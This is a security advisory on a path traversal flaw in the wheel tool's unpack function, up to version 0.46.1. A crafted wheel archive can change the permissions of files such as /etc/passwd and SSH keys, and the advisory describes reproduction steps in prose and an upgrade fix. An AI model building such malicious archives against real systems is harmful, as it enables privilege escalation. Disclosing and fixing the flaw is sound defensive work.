wheel Path Traversal Vulnerability Leading to Arbitrary File Permission Modification

A path traversal vulnerability has been identified in the wheel command line tool, specifically in versions through 0.46.1. The issue arises in the unpack function, which improperly handles file permissions after extracting files from a wheel archive. The vulnerability allows attackers to create malicious wheel files that, when unpacked, can alter the permissions of critical system files, such as /etc/passwd and SSH keys. This permission modification could lead to privilege escalation or arbitrary code execution by changing the writeability of scripts associated with those files.

Impact

Exploitation of this vulnerability allows for arbitrary modification of file permissions, potentially leading to privilege escalation or unauthorized code execution.

Reproduction

The vulnerability can be reproduced by using the unpack function from the wheel library or from the setuptools vendor. First, a malicious wheel file is created that includes a path traversal payload targeting a file outside the extraction directory. This wheel file is then unpacked using the vulnerable unpack function, which extracts the file while safely handling the extraction path but fails to properly manage the file permissions. As a result, the targeted file's permissions are altered, demonstrating the vulnerability.

Remediation

Users can upgrade to wheel version 0.46.2, which addresses the vulnerability by ensuring that the unpack function uses a sanitized file path for permission modifications, rather than trusting the archive header's filename.